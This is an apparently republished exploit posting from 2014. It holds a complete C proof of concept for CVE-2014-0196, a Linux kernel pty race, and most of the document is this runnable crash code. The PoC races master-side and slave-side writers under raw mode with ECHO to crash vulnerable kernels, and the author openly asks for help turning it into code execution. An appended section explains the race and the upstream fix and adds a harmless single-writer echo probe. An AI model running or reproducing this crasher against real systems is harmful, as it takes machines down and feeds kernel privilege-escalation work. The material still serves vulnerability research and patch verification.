Linux kernel multiple security vulnerabilities
Source: digitalcold0@gmail.com   Author: DigitalCold   Published: 2014-05-07
/* CVE-2014-0196 DOS PoC [Written May 5th, 2014]
 *    by DigitalCold <digitalcold0@gmail.com>
 *
 * Note: this crashes my i686 Gentoo system running 3.12.14
 * and an old Backtrack 5r3 running 3.2.6. Any advice on how to gain
 * code exec would be greatly appreciated.
 *
 * Usage: gcc -O2 -o pty pty.c -lutil && ./pty
 *
 * CVE: http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-0196.html
 * Bug discussion: http://bugzillafiles.novell.org/attachment.cgi?id=588355
 * How-to-pty: http://rachid.koucha.free.fr/tech_corner/pty_pdip.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <time.h>
#include <sys/mman.h>

#include <pty.h>
#include <termios.h>
#include <fcntl.h>

// shared flag used to sync the two writer processes (parent and slave child);
// it lives in a MAP_SHARED mapping so both sides see the same word
static volatile int *Sync = NULL;

// helper PIDs, so the parent can take them down when it gives up
static pid_t slavePid = -1, syncPid = -1;

// report an error (if any), kill the helper processes and exit
static void die(const char *msg) {
  if(msg)
    perror(msg);
  if(syncPid > 0)
    kill(syncPid, SIGKILL);
  if(slavePid > 0)
    kill(slavePid, SIGKILL);
  exit(1);
}

int main(void) {
  int master;
  struct termios tp;

  Sync = mmap(NULL, sizeof *Sync, PROT_READ | PROT_WRITE,
                MAP_SHARED | MAP_ANONYMOUS, -1, 0);

  if(Sync == MAP_FAILED)
  {
    perror("Sync mmap");
    exit(1);
  }

  // hold
  *Sync = 0;

  // create a child with a new PTY connection: the child's stdin/stdout/stderr
  // are the slave side, the parent keeps the master fd
  pid_t child = forkpty(&master, NULL, NULL, NULL);

  if(child == -1) {
    perror("forkpty");
    exit(1);
  }
  // parent
  else if(child > 0) {
    slavePid = child;

    printf("CVE-2014-0196 DOS PoC by DigitalCold\n");
    printf("[+] New PTY - Master PID %d, Slave PID %d\n", getpid(), child);
    printf("[+] Starting bombing run...\n");

    int flags = fcntl(master, F_GETFL, 0);
    fcntl(master, F_SETFL, flags | O_NONBLOCK);

    // synchronizer process: toggles the shared flag once a second so the
    // master-side and slave-side writers fire in the same window
    pid_t doSync = fork();

    if(!doSync) { // child
      // sync the two processes (CLK)
      while(1) {
        sleep(1);
        *Sync = 1; // release
        sleep(1);
        *Sync = 0;
      }
    }
    else if(doSync < 0)
      die("sync fork");

    syncPid = doSync;

    // used for printing status
    int cnt = 0;

    // data pushed through the master; it only has to be echoed by the slave's
    // line discipline, so fill it with a fixed byte instead of writing
    // uninitialised stack memory into the kernel
    char readBuf[256<<3];
    size_t k;

    for(k = 0; k < sizeof readBuf; k++)
      readBuf[k] = 'A';

    while(1) {
      while(!*Sync) usleep(1000);
      if(write(master, readBuf, sizeof readBuf) < 0) {
        if(errno != EAGAIN)
          die("master write");
      }

      // shovel the input
      if(read(master, readBuf, sizeof readBuf) < 0) {
        if(errno != EAGAIN)
          die("master read");
      }

      if(cnt >= 200000) {
        fprintf(stderr, "\n[-] No crash? Maybe you're not vulnerable...\n");
        die(NULL);
      }
      else if(cnt++ % 200 == 0)
        fprintf(stderr, ".");
    }
  }
  else { // child
    char discard[1024];

    if(tcgetattr(0, &tp) == -1)
        perror("tcgetattr");

    // enable raw mode with ECHO to trigger the bug
    cfmakeraw(&tp);
    tp.c_lflag |=  ECHO;

    if(tcsetattr(0, TCSAFLUSH, &tp) == -1)
        perror("tcsetattr");

    // make stdin and stdout non-blocking
    int flags = fcntl(0, F_GETFL, 0);
    fcntl(0, F_SETFL, flags | O_NONBLOCK);
    flags = fcntl(1, F_GETFL, 0);
    fcntl(1, F_SETFL, flags | O_NONBLOCK);

    // construct a lengthy crash string
    size_t badStrSz = 256<<2;
    char * badStr = malloc(badStrSz);
    size_t i;

    if(!badStr)
      exit(1);

    for(i = 0; i < badStrSz; i++)
      badStr[i] = 'A';

    // slave loop
    while(1) {
      while(!*Sync) usleep(1000);
      if(write(1, badStr, badStrSz) < 0)
        if(errno != EAGAIN)
          exit(1);

      // eat the incoming data
      if(read(0, discard, sizeof discard) < 0)
        if(errno != EAGAIN)
          exit(1);
    }
  }

  return 0;
}
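The slave-side termios the PoC's child sets up (cfmakeraw, then ECHO switched back on) is what puts the kernel on the vulnerable path. With ECHO set and OPOST cleared, the line discipline's echo of the master's input and the slave process's own write(1, ...) both end up in pty_write on the same master-side buffer, and on a kernel without the upstream fix ("n_tty: Fix n_tty_write crash when echoing in raw mode", mainline May 2014) the two are not serialised against each other; that is the race the two writer loops above are trying to hit. The following example is added here and is not part of DigitalCold's PoC. It opens a pty pair, applies the same raw-plus-ECHO termios to the slave, writes a constructed probe through the master and reads back what the echo path produced, showing that with ECHOCTL each control byte comes back as two bytes ("^A"), so the echo writer emits more than it was fed. It is Linux-only (it uses the /dev/ptmx TIOCSPTLCK and TIOCGPTN ioctls instead of posix_openpt/grantpt/unlockpt/ptsname so it builds without libutil) and assumes /dev/ptmx and a mounted devpts. The probe bytes, the 200 ms quiet window, and the names echo_roundtrip, run_probe and last_echo are this example's own. It uses a single writer and no concurrency, so it does not trigger the bug and is safe to run on any kernel.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#include <termios.h>
#include <sys/ioctl.h>

/* Open a Unix98 pty pair with the raw /dev/ptmx ioctls (Linux only); same
 * effect as posix_openpt/grantpt/unlockpt/ptsname, no libutil needed. */
static int open_pty_pair(int *master, int *slave)
{
    int unlock = 0;
    unsigned int ptn;
    char path[32];
    *master = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (*master < 0)
        return -1;
    if (ioctl(*master, TIOCSPTLCK, &unlock) < 0 ||   /* unlockpt() */
        ioctl(*master, TIOCGPTN, &ptn) < 0) {        /* ptsname() */
        close(*master);
        return -1;
    }
    snprintf(path, sizeof path, "/dev/pts/%u", ptn);
    *slave = open(path, O_RDWR | O_NOCTTY);
    if (*slave < 0) {
        close(*master);
        return -1;
    }
    return 0;
}

/* The termios state the PoC puts its slave in: raw input, no signals, no
 * output post-processing (OPOST off), but ECHO kept on. ECHOCTL (a pty's
 * default) makes the line discipline echo a control byte c as '^', c^0x40. */
static int set_raw_echo(int slave)
{
    struct termios t;
    if (tcgetattr(slave, &t) < 0)
        return -1;
    t.c_iflag &= ~(IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON);
    t.c_oflag &= ~OPOST;
    t.c_cflag &= ~(CSIZE | PARENB);
    t.c_cflag |= CS8;
    t.c_lflag &= ~(ICANON | ISIG | IEXTEN | ECHONL);
    t.c_lflag |= ECHO | ECHOCTL;
    t.c_cc[VMIN] = 1;
    t.c_cc[VTIME] = 0;
    return tcsetattr(slave, TCSANOW, &t);
}

/* Collect what the slave's line discipline echoes back to the master until
 * the master has been quiet for quiet_ms (assumed long enough for the
 * flip-buffer work to run). Returns bytes collected, or -1 on error. */
static ssize_t collect_echo(int master, char *out, size_t cap, int quiet_ms)
{
    struct pollfd pfd = { .fd = master, .events = POLLIN };
    size_t got = 0;
    while (got < cap) {
        int r = poll(&pfd, 1, quiet_ms);
        if (r < 0)
            return -1;
        if (r == 0)
            break;                      /* nothing more is coming */
        ssize_t n = read(master, out + got, cap - got);
        if (n <= 0)
            break;
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* Push len bytes into a fresh pty through the master; returns how many bytes
 * the ECHO path sent back (NUL-terminated in out), or -1 if no pty is available. */
ssize_t echo_roundtrip(const unsigned char *in, size_t len, char *out, size_t cap)
{
    int master, slave;
    ssize_t n = -1;
    if (open_pty_pair(&master, &slave) < 0)
        return -1;
    if (set_raw_echo(slave) == 0 && write(master, in, len) == (ssize_t)len)
        n = collect_echo(master, out, cap - 1, 200);
    if (n >= 0)
        out[n] = '\0';
    close(slave);
    close(master);
    return n;
}

/* Constructed probe (not from the PoC): two control bytes around three
 * printable ones. Expected echo with ECHOCTL: "^Aabc^B", 7 bytes for 5 in. */
static const unsigned char PROBE[] = { 0x01, 'a', 'b', 'c', 0x02 };
char last_echo[64];

/* Run the probe once; returns the echoed length (7 expected), -1 if no pty. */
ssize_t run_probe(void)
{
    return echo_roundtrip(PROBE, sizeof PROBE, last_echo, sizeof last_echo);
}

int main(void)
{
    ssize_t n = run_probe();
    if (n < 0) {
        perror("pty");
        return 1;
    }
    printf("sent %zu bytes, line discipline echoed %zd: ", sizeof PROBE, n);
    for (ssize_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)last_echo[i];
        if (c < 0x20 || c >= 0x7f)
            printf("\\x%02x", c);
        else
            putchar(c);
    }
    putchar('\n');
    return 0;
}
```

Build with gcc -O2 -o echoprobe echoprobe.c; because the pty is created through the ptmx ioctls rather than forkpty/openpty, no -lutil is needed. Reading the slave is deliberately skipped: the echo is generated by the slave's line discipline when the master's data is received, whether or not any process consumes it, which is also why the PoC's slave only has to drain stdin to keep the input buffer from filling.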
